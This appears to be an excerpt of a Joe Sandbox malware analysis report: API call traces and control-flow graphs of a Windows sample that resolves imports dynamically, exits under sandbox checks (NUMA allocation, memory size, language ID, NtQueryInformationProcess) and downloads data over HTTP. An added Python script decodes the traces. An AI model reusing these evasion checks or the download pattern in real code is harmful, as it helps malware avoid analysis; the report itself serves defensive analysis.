                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 5fa965e554c11f8115ef694034c64db78346c705d76e1d0302d7eab0a88607e2
                          • Instruction ID: 97a64621f9b2c8e7d916f5b1e0a6b2d81af25f48e877ed96997e13bb52147512
                          • Opcode Fuzzy Hash: 5fa965e554c11f8115ef694034c64db78346c705d76e1d0302d7eab0a88607e2
                          • Instruction Fuzzy Hash: A852AF71D01A26ABCB61EFA4EC45ADE7BBBBF04311F050528F805A7251DB38DD418FA4

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2125 646390-6463bd GetPEB 2126 6465c3-646623 LoadLibraryA * 5 2125->2126 2127 6463c3-6465be call 6462f0 GetProcAddress * 20 2125->2127 2129 646625-646633 GetProcAddress 2126->2129 2130 646638-64663f 2126->2130 2127->2126 2129->2130 2131 646641-646667 GetProcAddress * 2 2130->2131 2132 64666c-646673 2130->2132 2131->2132 2134 646675-646683 GetProcAddress 2132->2134 2135 646688-64668f 2132->2135 2134->2135 2136 6466a4-6466ab 2135->2136 2137 646691-64669f GetProcAddress 2135->2137 2139 6466d7-6466da 2136->2139 2140 6466ad-6466d2 GetProcAddress * 2 2136->2140 2137->2136 2140->2139
                          APIs
                          • GetProcAddress.KERNEL32(75900000,01290720), ref: 006463E9
                          • GetProcAddress.KERNEL32(75900000,012907B0), ref: 00646402
                          • GetProcAddress.KERNEL32(75900000,012906A8), ref: 0064641A
                          • GetProcAddress.KERNEL32(75900000,012906C0), ref: 00646432
                          • GetProcAddress.KERNEL32(75900000,01298830), ref: 0064644B
                          • GetProcAddress.KERNEL32(75900000,012867C0), ref: 00646463
                          • GetProcAddress.KERNEL32(75900000,01286A00), ref: 0064647B
                          • GetProcAddress.KERNEL32(75900000,012907F8), ref: 00646494
                          • GetProcAddress.KERNEL32(75900000,01290558), ref: 006464AC
                          • GetProcAddress.KERNEL32(75900000,01290810), ref: 006464C4
                          • GetProcAddress.KERNEL32(75900000,012906F0), ref: 006464DD
                          • GetProcAddress.KERNEL32(75900000,01286740), ref: 006464F5
                          • GetProcAddress.KERNEL32(75900000,01290828), ref: 0064650D
                          • GetProcAddress.KERNEL32(75900000,01290708), ref: 00646526
                          • GetProcAddress.KERNEL32(75900000,012866A0), ref: 0064653E
                          • GetProcAddress.KERNEL32(75900000,01290840), ref: 00646556
                          • GetProcAddress.KERNEL32(75900000,012908A0), ref: 0064656F
                          • GetProcAddress.KERNEL32(75900000,01286700), ref: 00646587
                          • GetProcAddress.KERNEL32(75900000,012908E8), ref: 0064659F
                          • GetProcAddress.KERNEL32(75900000,01286820), ref: 006465B8
                          • LoadLibraryA.KERNEL32(012908B8,?,?,?,00641C03), ref: 006465C9
                          • LoadLibraryA.KERNEL32(012908D0,?,?,?,00641C03), ref: 006465DB
                          • LoadLibraryA.KERNEL32(01290870,?,?,?,00641C03), ref: 006465ED
                          • LoadLibraryA.KERNEL32(01290900,?,?,?,00641C03), ref: 006465FE
                          • LoadLibraryA.KERNEL32(01290918,?,?,?,00641C03), ref: 00646610
                          • GetProcAddress.KERNEL32(75070000,01290858), ref: 0064662D
                          • GetProcAddress.KERNEL32(75FD0000,01290888), ref: 00646649
                          • GetProcAddress.KERNEL32(75FD0000,01298DA8), ref: 00646661
                          • GetProcAddress.KERNEL32(75A50000,01298D00), ref: 0064667D
                          • GetProcAddress.KERNEL32(74E50000,012868C0), ref: 00646699
                          • GetProcAddress.KERNEL32(76E80000,01298840), ref: 006466B5
                          • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 006466CC
                          Strings
                          • NtQueryInformationProcess, xrefs: 006466C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: a189ecc0bccb56762902944743c416a31782c1f8eeb02684495b386c6184d8f5
                          • Instruction ID: 623a6e4526a34e9545e88c055e97702d96c0e6960cd61260879b8ebe96bb708f
                          • Opcode Fuzzy Hash: a189ecc0bccb56762902944743c416a31782c1f8eeb02684495b386c6184d8f5
                          • Instruction Fuzzy Hash: B7A122B5611B00DFD754DF68ED49A263BB9F78C653300891AE996D33A4EB3CA800DF61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2141 641bf0-641c0b call 622a90 call 646390 2146 641c0d 2141->2146 2147 641c1a-641c27 call 622930 2141->2147 2148 641c10-641c18 2146->2148 2151 641c35-641c63 2147->2151 2152 641c29-641c2f lstrcpy 2147->2152 2148->2147 2148->2148 2156 641c65-641c67 ExitProcess 2151->2156 2157 641c6d-641c7b GetSystemInfo 2151->2157 2152->2151 2158 641c85-641ca0 call 621030 call 6210c0 GetUserDefaultLangID 2157->2158 2159 641c7d-641c7f ExitProcess 2157->2159 2164 641ca2-641ca9 2158->2164 2165 641cb8-641cca call 642ad0 call 643e10 2158->2165 2164->2165 2166 641cb0-641cb2 ExitProcess 2164->2166 2171 641ce7-641d06 lstrlen call 622930 2165->2171 2172 641ccc-641cde call 642a40 call 643e10 2165->2172 2178 641d23-641d40 lstrlen call 622930 2171->2178 2179 641d08-641d0d 2171->2179 2172->2171 2183 641ce0-641ce1 ExitProcess 2172->2183 2186 641d42-641d44 2178->2186 2187 641d5a-641d7b call 642ad0 lstrlen call 622930 2178->2187 2179->2178 2181 641d0f-641d11 2179->2181 2181->2178 2184 641d13-641d1d lstrcpy lstrcat 2181->2184 2184->2178 2186->2187 2188 641d46-641d54 lstrcpy lstrcat 2186->2188 2193 641d7d-641d7f 2187->2193 2194 641d9a-641db4 lstrlen call 622930 2187->2194 2188->2187 2193->2194 2195 641d81-641d85 2193->2195 2199 641db6-641db8 2194->2199 2200 641dce-641deb call 642a40 lstrlen call 622930 2194->2200 2195->2194 2197 641d87-641d94 lstrcpy lstrcat 2195->2197 2197->2194 2199->2200 2201 641dba-641dc8 lstrcpy lstrcat 2199->2201 2206 641ded-641def 2200->2206 2207 641e0a-641e0f 2200->2207 2201->2200 2206->2207 2208 641df1-641df5 2206->2208 2209 641e16-641e22 call 622930 2207->2209 2210 641e11 call 622a20 2207->2210 2208->2207 2211 641df7-641e04 lstrcpy lstrcat 2208->2211 2215 641e24-641e26 2209->2215 2216 641e30-641e66 call 622a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2217 641e28-641e2a lstrcpy 2215->2217 2228 641e8c-641ea0 CreateEventA call 641b20 call 63ffd0 2216->2228 2229 641e68-641e8a CloseHandle Sleep OpenEventA 2216->2229 
2217->2216 2233 641ea5-641eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                          APIs
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,01290720), ref: 006463E9
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,012907B0), ref: 00646402
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,012906A8), ref: 0064641A
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,012906C0), ref: 00646432
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,01298830), ref: 0064644B
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,012867C0), ref: 00646463
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,01286A00), ref: 0064647B
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,012907F8), ref: 00646494
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,01290558), ref: 006464AC
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,01290810), ref: 006464C4
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,012906F0), ref: 006464DD
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,01286740), ref: 006464F5
                            • Part of subcall function 00646390: GetProcAddress.KERNEL32(75900000,01290828), ref: 0064650D
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00641C2F
                          • ExitProcess.KERNEL32 ref: 00641C67
                          • GetSystemInfo.KERNEL32(?), ref: 00641C71
                          • ExitProcess.KERNEL32 ref: 00641C7F
                            • Part of subcall function 00621030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00621046
                            • Part of subcall function 00621030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0062104D
                            • Part of subcall function 00621030: ExitProcess.KERNEL32 ref: 00621058
                            • Part of subcall function 006210C0: GlobalMemoryStatusEx.KERNEL32 ref: 006210EA
                            • Part of subcall function 006210C0: ExitProcess.KERNEL32 ref: 00621114
                          • GetUserDefaultLangID.KERNEL32 ref: 00641C8F
                          • ExitProcess.KERNEL32 ref: 00641CB2
                          • ExitProcess.KERNEL32 ref: 00641CE1
                          • lstrlen.KERNEL32(01298850), ref: 00641CEE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00641D15
                          • lstrcat.KERNEL32(00000000,01298850), ref: 00641D1D
                          • lstrlen.KERNEL32(00654B98), ref: 00641D28
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641D48
                          • lstrcat.KERNEL32(00000000,00654B98), ref: 00641D54
                          • lstrlen.KERNEL32(00000000), ref: 00641D63
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641D89
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00641D94
                          • lstrlen.KERNEL32(00654B98), ref: 00641D9F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641DBC
                          • lstrcat.KERNEL32(00000000,00654B98), ref: 00641DC8
                          • lstrlen.KERNEL32(00000000), ref: 00641DD7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641DF9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00641E04
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                          • String ID:
                          • API String ID: 3366406952-0
                          • Opcode ID: d5a400cbd8be30b52c25204a6b9ebe7dcee96f7ab25a79ed1c8e9a5e9027c00a
                          • Instruction ID: 79307382397765baca29caccc0648666021001355309d4f1a11424ff2d52fe98
                          • Opcode Fuzzy Hash: d5a400cbd8be30b52c25204a6b9ebe7dcee96f7ab25a79ed1c8e9a5e9027c00a
                          • Instruction Fuzzy Hash: 7771B931941726EBD760ABB0EC4DBAE3A7BBF45712F044418F946AB291DF38D841CB64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2234 626c40-626c64 call 622930 2237 626c66-626c6b 2234->2237 2238 626c75-626c97 call 624bc0 2234->2238 2237->2238 2239 626c6d-626c6f lstrcpy 2237->2239 2242 626caa-626cba call 622930 2238->2242 2243 626c99 2238->2243 2239->2238 2247 626cc8-626cf5 InternetOpenA StrCmpCA 2242->2247 2248 626cbc-626cc2 lstrcpy 2242->2248 2244 626ca0-626ca8 2243->2244 2244->2242 2244->2244 2249 626cf7 2247->2249 2250 626cfa-626cfc 2247->2250 2248->2247 2249->2250 2251 626d02-626d22 InternetConnectA 2250->2251 2252 626ea8-626ebb call 622930 2250->2252 2253 626ea1-626ea2 InternetCloseHandle 2251->2253 2254 626d28-626d5d HttpOpenRequestA 2251->2254 2259 626ec9-626ee0 call 622a20 * 2 2252->2259 2260 626ebd-626ebf 2252->2260 2253->2252 2256 626d63-626d65 2254->2256 2257 626e94-626e9e InternetCloseHandle 2254->2257 2261 626d67-626d77 InternetSetOptionA 2256->2261 2262 626d7d-626dad HttpSendRequestA HttpQueryInfoA 2256->2262 2257->2253 2260->2259 2263 626ec1-626ec3 lstrcpy 2260->2263 2261->2262 2265 626dd4-626de4 call 643d90 2262->2265 2266 626daf-626dd3 call 6471e0 call 622a20 * 2 2262->2266 2263->2259 2265->2266 2275 626de6-626de8 2265->2275 2277 626dee-626e07 InternetReadFile 2275->2277 2278 626e8d-626e8e InternetCloseHandle 2275->2278 2277->2278 2280 626e0d 2277->2280 2278->2257 2282 626e10-626e15 2280->2282 2282->2278 2283 626e17-626e3d call 647310 2282->2283 2286 626e44-626e51 call 622930 2283->2286 2287 626e3f call 622a20 2283->2287 2291 626e53-626e57 2286->2291 2292 626e61-626e8b call 622a20 InternetReadFile 2286->2292 2287->2286 2291->2292 2293 626e59-626e5b lstrcpy 2291->2293 2292->2278 2292->2282 2293->2292
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00626C6F
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00626CC2
                          • InternetOpenA.WININET(0064CFEC,00000001,00000000,00000000,00000000), ref: 00626CD5
                          • StrCmpCA.SHLWAPI(?,0129E4C8), ref: 00626CED
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00626D15
                          • HttpOpenRequestA.WININET(00000000,GET,?,0129DD80,00000000,00000000,-00400100,00000000), ref: 00626D50
                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00626D77
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00626D86
                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00626DA5
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00626DFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00626E5B
                          • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00626E7D
                          • InternetCloseHandle.WININET(00000000), ref: 00626E8E
                          • InternetCloseHandle.WININET(?), ref: 00626E98
                          • InternetCloseHandle.WININET(00000000), ref: 00626EA2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00626EC3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                          • String ID: ERROR$GET
                          • API String ID: 3687753495-3591763792
                          • Opcode ID: 61c230d8165b6ba1f53d72e68efef8005fe95786a00baeb5392ba03a96b1b1b5
                          • Instruction ID: 63fa0f2a60417eb5a3007c30f52f059b44905e404514368001477fae0f6b3f48
                          • Opcode Fuzzy Hash: 61c230d8165b6ba1f53d72e68efef8005fe95786a00baeb5392ba03a96b1b1b5
                          • Instruction Fuzzy Hash: 3A81BF71A40B26ABDB60DFA4EC45BEE77BAAF04701F000428F945E7380DB74AD048F94

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2850 624a60-624afc RtlAllocateHeap 2867 624b7a-624bbe VirtualProtect 2850->2867 2868 624afe-624b03 2850->2868 2869 624b06-624b78 2868->2869 2869->2867
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00624AA3
                          • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00624BB0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-3329630956
                          • Opcode ID: 326afdc7ab01fa736ede3e32f7ad0bd3c5036247b7f59c6485f82db7f183aa9d
                          • Instruction ID: 58928c173a91f31a5541bed5cb5fe2f8457a956722d82d8c84e23aee83448dc4
                          • Opcode Fuzzy Hash: 326afdc7ab01fa736ede3e32f7ad0bd3c5036247b7f59c6485f82db7f183aa9d
                          • Instruction Fuzzy Hash: 0C31E718B8022A758620EBEF4CC7B9F7F56FF8576AF0340967C0857180CDA154A9CAA2
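The APIs lists in the entries above record each call with raw DWORD arguments, which hides what the constants mean. The script below is an added example (not code from the report or from the sample) that parses those bullet lines and decodes the values that matter for three of the routines on this page: for 0x646390 it tallies GetProcAddress per module base and reports which base resolved NtQueryInformationProcess (an ntdll export, so that base is ntdll); for 0x626c40 it names the WinINet constants (nService 3 is INTERNET_SERVICE_HTTP, option 0x1F is INTERNET_OPTION_SECURITY_FLAGS, info level 0x13 is HTTP_QUERY_STATUS_CODE, reads are 0x7CF bytes at a time) and folds Joe's signed rendering of the HttpOpenRequestA flags (-00400100) back into a 32-bit mask; for 0x624a60 it identifies 0x100 as PAGE_GUARD. Two caveats: the decoded flag mask is almost all ones and the VirtualProtect base address is captured as 0, so these argument snapshots should be confirmed in a debugger before being relied on, and PAGE_GUARD is a modifier that VirtualProtect expects OR'd with a base protection, so the exact protection cannot be read off this line. The sample lines are copied from this page; the constant tables are partial and only name values the report shows.

```python
"""Decode the per-function "APIs" bullet lists that Joe Sandbox prints.

Added example for this page, not code from the report or from the sample.
SAMPLE is pasted from the page's entries for 0x646390 (import resolution),
0x626c40 (WinINet download) and 0x624a60 (VirtualProtect); the constant
tables are partial and only name the values that appear in the report."""
import re
from collections import Counter

# "<API>.<DLL>(<args>), ref: <addr>"; args may be absent ("ExitProcess.KERNEL32
# ref: ...") and calls hoisted from a callee carry a "Part of subcall function <addr>:" prefix.
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<dll>\w+)(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-Fa-f]+)"
)

def to_u32(tok):
    """Joe prints DWORD arguments as 8 hex digits, negative ones with a leading
    '-'; fold both into an unsigned 32-bit value. None for '?' and strings."""
    m = re.fullmatch(r"(-?)([0-9A-Fa-f]{8})", tok)
    if not m:
        return None
    v = int(m.group(2), 16)
    return (-v) & 0xFFFFFFFF if m.group(1) else v

def parse_api_line(line):
    m = API_LINE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return {"api": m.group("api"), "dll": m.group("dll"), "args": args,
            "ref": int(m.group("ref"), 16), "caller": m.group("caller")}

def parse_report(text):
    return [r for r in map(parse_api_line, text.splitlines()) if r]

# --- dynamic import resolution (entry 0x646390) ---
def resolution_map(records):
    """GetProcAddress calls per hModule; most names are logged only as heap
    pointers, so the module base is the useful datum the report leaves us."""
    return Counter(r["args"][0] for r in records if r["api"] == "GetProcAddress")

def module_exporting(records, export):
    for r in records:  # hModule that resolved a named export, None if never seen
        if r["api"] == "GetProcAddress" and r["args"][1:2] == [export]:
            return r["args"][0]
    return None

# --- argument decoding (entries 0x626c40 and 0x624a60) ---
# (api, argument index) -> (parameter name, {value: symbolic name})
ENUM_ARGS = {
    ("InternetConnectA", 5): ("nService", {3: "INTERNET_SERVICE_HTTP"}),
    ("InternetSetOptionA", 1): ("dwOption", {31: "INTERNET_OPTION_SECURITY_FLAGS"}),
    ("HttpQueryInfoA", 1): ("dwInfoLevel", {19: "HTTP_QUERY_STATUS_CODE"}),
    ("InternetReadFile", 2): ("dwNumberOfBytesToRead", {}),
    ("VirtualProtect", 2): ("flNewProtect", {0x100: "PAGE_GUARD"}),
}
HTTP_OPEN_REQUEST_FLAGS = {  # bits of HttpOpenRequestA dwFlags (argument index 6)
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
}

def decode_call(rec):
    """{parameter: readable value} for the arguments the tables above cover."""
    out = {}
    for i, tok in enumerate(rec["args"]):
        v = to_u32(tok)
        if v is None:
            continue
        if (rec["api"], i) in ENUM_ARGS:
            name, table = ENUM_ARGS[(rec["api"], i)]
            out[name] = table.get(v, v)
        elif rec["api"] == "HttpOpenRequestA" and i == 6:
            out["dwFlags"] = (v, [n for b, n in HTTP_OPEN_REQUEST_FLAGS.items() if v & b])
    return out

SAMPLE = """\
• GetProcAddress.KERNEL32(75900000,01290720), ref: 006463E9
• GetProcAddress.KERNEL32(75900000,012907B0), ref: 00646402
• GetProcAddress.KERNEL32(75900000,012906A8), ref: 0064641A
• GetProcAddress.KERNEL32(76E80000,01298840), ref: 006466B5
• GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 006466CC
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00626D15
• HttpOpenRequestA.WININET(00000000,GET,?,0129DD80,00000000,00000000,-00400100,00000000), ref: 00626D50
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00626D77
• HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00626DA5
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00626DFF
• ExitProcess.KERNEL32 ref: 00641C67
• VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00624BB0
"""

if __name__ == "__main__":
    for r in parse_report(SAMPLE):
        print(r["api"], f"{r['ref']:08X}", decode_call(r))
```

Paste any other APIs list from the report into parse_report to get the same records; extend ENUM_ARGS only with values you have checked against the Windows SDK headers, since a wrong symbolic name is worse than the raw number.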
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00642A6F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00642A76
                          • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00642A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 3df67415bb3e5d926c41bcc413c2ed12af0dc62dffe352ca993292dff01b7252
                          • Instruction ID: 1ffdde6fa9d99c01123712512cb71f13d362373cfff764ce8b25c0c5bdf82ac2
                          • Opcode Fuzzy Hash: 3df67415bb3e5d926c41bcc413c2ed12af0dc62dffe352ca993292dff01b7252
                          • Instruction Fuzzy Hash: A0F0B4B1A40704EBD700DF88DD49B9EBBBCF708B22F000226FA15E3280D778190486A1

                           Control-flow Graph (flattened edge list of the rendered graph; legend of the rendering: Executed / Not Executed)
                           control_flow_graph 633 6466e0-6466e7 634 6466ed-646af9 GetProcAddress * 43 633->634 635 646afe-646b92 LoadLibraryA * 8 633->635 634->635 636 646b94-646c03 GetProcAddress * 5 635->636 637 646c08-646c0f 635->637 636->637 638 646c15-646ccd GetProcAddress * 8 637->638 639 646cd2-646cd9 637->639 638->639 640 646d4f-646d56 639->640 641 646cdb-646d4a GetProcAddress * 5 639->641 642 646d5c-646de4 GetProcAddress * 6 640->642 643 646de9-646df0 640->643 641->640 642->643 644 646df6-646f0b GetProcAddress * 12 643->644 645 646f10-646f17 643->645 644->645 646 646f8d-646f94 645->646 647 646f19-646f88 GetProcAddress * 5 645->647 648 646f96-646fbc GetProcAddress * 2 646->648 649 646fc1-646fc8 646->649 647->646 648->649 650 646ff5-646ffc 649->650 651 646fca-646ff0 GetProcAddress * 2 649->651 652 647002-6470e8 GetProcAddress * 10 650->652 653 6470ed-6470f4 650->653 651->650 652->653 654 6470f6-64714d GetProcAddress * 4 653->654 655 647152-647159 653->655 654->655 656 64716e-647175 655->656 657 64715b-647169 GetProcAddress 655->657 658 647177-6471ce GetProcAddress * 4 656->658 659 6471d3 656->659 657->656 658->659
                          APIs
                          • GetProcAddress.KERNEL32(75900000,012868E0), ref: 006466F5
                          • GetProcAddress.KERNEL32(75900000,01286900), ref: 0064670D
                          • GetProcAddress.KERNEL32(75900000,01298F88), ref: 00646726
                          • GetProcAddress.KERNEL32(75900000,01298FB8), ref: 0064673E
                          • GetProcAddress.KERNEL32(75900000,0129CFE0), ref: 00646756
                          • GetProcAddress.KERNEL32(75900000,0129CFB0), ref: 0064676F
                          • GetProcAddress.KERNEL32(75900000,0128B220), ref: 00646787
                          • GetProcAddress.KERNEL32(75900000,0129D070), ref: 0064679F
                          • GetProcAddress.KERNEL32(75900000,0129D0D0), ref: 006467B8
                          • GetProcAddress.KERNEL32(75900000,0129D028), ref: 006467D0
                          • GetProcAddress.KERNEL32(75900000,0129CF50), ref: 006467E8
                          • GetProcAddress.KERNEL32(75900000,01286940), ref: 00646801
                          • GetProcAddress.KERNEL32(75900000,01286980), ref: 00646819
                          • GetProcAddress.KERNEL32(75900000,01286860), ref: 00646831
                          • GetProcAddress.KERNEL32(75900000,012869C0), ref: 0064684A
                          • GetProcAddress.KERNEL32(75900000,0129D040), ref: 00646862
                          • GetProcAddress.KERNEL32(75900000,0129D058), ref: 0064687A
                          • GetProcAddress.KERNEL32(75900000,0128B108), ref: 00646893
                          • GetProcAddress.KERNEL32(75900000,01286A20), ref: 006468AB
                          • GetProcAddress.KERNEL32(75900000,0129D088), ref: 006468C3
                          • GetProcAddress.KERNEL32(75900000,0129D0A0), ref: 006468DC
                          • GetProcAddress.KERNEL32(75900000,0129CF68), ref: 006468F4
                          • GetProcAddress.KERNEL32(75900000,0129CFF8), ref: 0064690C
                          • GetProcAddress.KERNEL32(75900000,012866C0), ref: 00646925
                          • GetProcAddress.KERNEL32(75900000,0129D0B8), ref: 0064693D
                          • GetProcAddress.KERNEL32(75900000,0129CF20), ref: 00646955
                          • GetProcAddress.KERNEL32(75900000,0129CF38), ref: 0064696E
                          • GetProcAddress.KERNEL32(75900000,0129CF80), ref: 00646986
                          • GetProcAddress.KERNEL32(75900000,0129CFC8), ref: 0064699E
                          • GetProcAddress.KERNEL32(75900000,0129CF98), ref: 006469B7
                          • GetProcAddress.KERNEL32(75900000,0129D010), ref: 006469CF
                          • GetProcAddress.KERNEL32(75900000,0129CB00), ref: 006469E7
                          • GetProcAddress.KERNEL32(75900000,0129C920), ref: 00646A00
                          • GetProcAddress.KERNEL32(75900000,01299E08), ref: 00646A18
                          • GetProcAddress.KERNEL32(75900000,0129C9C8), ref: 00646A30
                          • GetProcAddress.KERNEL32(75900000,0129C9E0), ref: 00646A49
                          • GetProcAddress.KERNEL32(75900000,012866E0), ref: 00646A61
                          • GetProcAddress.KERNEL32(75900000,0129C9F8), ref: 00646A79
                          • GetProcAddress.KERNEL32(75900000,012867E0), ref: 00646A92
                          • GetProcAddress.KERNEL32(75900000,0129CA10), ref: 00646AAA
                          • GetProcAddress.KERNEL32(75900000,0129CA28), ref: 00646AC2
                          • GetProcAddress.KERNEL32(75900000,01286300), ref: 00646ADB
                          • GetProcAddress.KERNEL32(75900000,01286540), ref: 00646AF3
                          • LoadLibraryA.KERNEL32(0129CA58,0064051F), ref: 00646B05
                          • LoadLibraryA.KERNEL32(0129CA40), ref: 00646B16
                          • LoadLibraryA.KERNEL32(0129CAE8), ref: 00646B28
                          • LoadLibraryA.KERNEL32(0129C9B0), ref: 00646B3A
                          • LoadLibraryA.KERNEL32(0129CAB8), ref: 00646B4B
                          • LoadLibraryA.KERNEL32(0129CBA8), ref: 00646B5D
                          • LoadLibraryA.KERNEL32(0129CA70), ref: 00646B6F
                          • LoadLibraryA.KERNEL32(0129CBC0), ref: 00646B80
                          • GetProcAddress.KERNEL32(75FD0000,01286580), ref: 00646B9C
                          • GetProcAddress.KERNEL32(75FD0000,0129CAD0), ref: 00646BB4
                          • GetProcAddress.KERNEL32(75FD0000,012988A0), ref: 00646BCD
                          • GetProcAddress.KERNEL32(75FD0000,0129CB18), ref: 00646BE5
                          • GetProcAddress.KERNEL32(75FD0000,01286320), ref: 00646BFD
                          • GetProcAddress.KERNEL32(734B0000,0128B130), ref: 00646C1D
                          • GetProcAddress.KERNEL32(734B0000,01286340), ref: 00646C35
                          • GetProcAddress.KERNEL32(734B0000,0128B270), ref: 00646C4E
                          • GetProcAddress.KERNEL32(734B0000,0129CB90), ref: 00646C66
                          • GetProcAddress.KERNEL32(734B0000,0129C980), ref: 00646C7E
                          • GetProcAddress.KERNEL32(734B0000,01286360), ref: 00646C97
                          • GetProcAddress.KERNEL32(734B0000,01286660), ref: 00646CAF
                          • GetProcAddress.KERNEL32(734B0000,0129CBD8), ref: 00646CC7
                          • GetProcAddress.KERNEL32(763B0000,012863E0), ref: 00646CE3
                          • GetProcAddress.KERNEL32(763B0000,012864C0), ref: 00646CFB
                          • GetProcAddress.KERNEL32(763B0000,0129CB30), ref: 00646D14
                          • GetProcAddress.KERNEL32(763B0000,0129CB48), ref: 00646D2C
                          • GetProcAddress.KERNEL32(763B0000,01286560), ref: 00646D44
                          • GetProcAddress.KERNEL32(750F0000,0128B298), ref: 00646D64
                          • GetProcAddress.KERNEL32(750F0000,0128AF78), ref: 00646D7C
                          • GetProcAddress.KERNEL32(750F0000,0129CBF0), ref: 00646D95
                          • GetProcAddress.KERNEL32(750F0000,01286480), ref: 00646DAD
                          • GetProcAddress.KERNEL32(750F0000,012865C0), ref: 00646DC5
                          • GetProcAddress.KERNEL32(750F0000,0128AEB0), ref: 00646DDE
                          • GetProcAddress.KERNEL32(75A50000,0129CA88), ref: 00646DFE
